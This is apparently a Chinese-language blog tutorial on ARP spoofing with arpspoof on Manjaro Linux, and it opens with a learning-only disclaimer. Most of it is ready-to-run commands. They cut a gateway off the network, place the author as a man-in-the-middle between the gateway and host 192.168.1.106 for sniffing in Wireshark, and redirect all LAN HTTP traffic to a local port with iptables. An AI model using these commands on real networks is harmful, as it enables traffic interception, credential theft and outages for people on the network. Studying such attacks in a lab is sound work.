Arp 攻击

本篇内容仅用于学习和测试,本人遵纪守法。

安装

arpspoof 是 dsniff 包里的一个程序,可用于arp攻击。Manjaro 中执行以下命令安装这个软件包就可以使用了。

1
yay -S dsniff

介绍

arpspoof - 截获交换局域网中的数据包。

1
2
3
4
5
6
用法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

描述
arpspoof通过伪造的ARP响应包改变局域网中从目标主机(或所有主机)到另一个主机(host)的数据包转发路径。这是交换局域网中嗅探网络流量的一种极为有效的方法。
内核IP转发(或如fragrouter这样的、用户层面的、能完成同样功能的软件)必须提前开启。

使用情景

  1. 断网攻击,不开启流量转发,使用我的无线网卡 wlp8s0,攻击网关
1
sudo arpspoof -i wlp8s0 -t 192.168.1.1
  1. 中间人攻击,截获用户和网关之间的流量

开启流量转发

1
echo 1 >> /proc/sys/net/ipv4/ip_forward

欺骗双方,充当中间人

1
2
sudo arpspoof -i wlp8s0 -t 192.168.1.1 192.168.1.106
sudo arpspoof -i wlp8s0 -t 192.168.1.106 192.168.1.1

此时网关以为我是106,而106以为我是网关。双方的流量都将经过这里,使用 WireShark 即可对经过网卡的流量进行分析。

  1. 重定向攻击

使局域网所有设备访问的 80 端口,重定向到我这里的 8080 端口,需要开启流量转发。

1
sudo arpspoof -i wlp8s0 192.168.1.1
1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080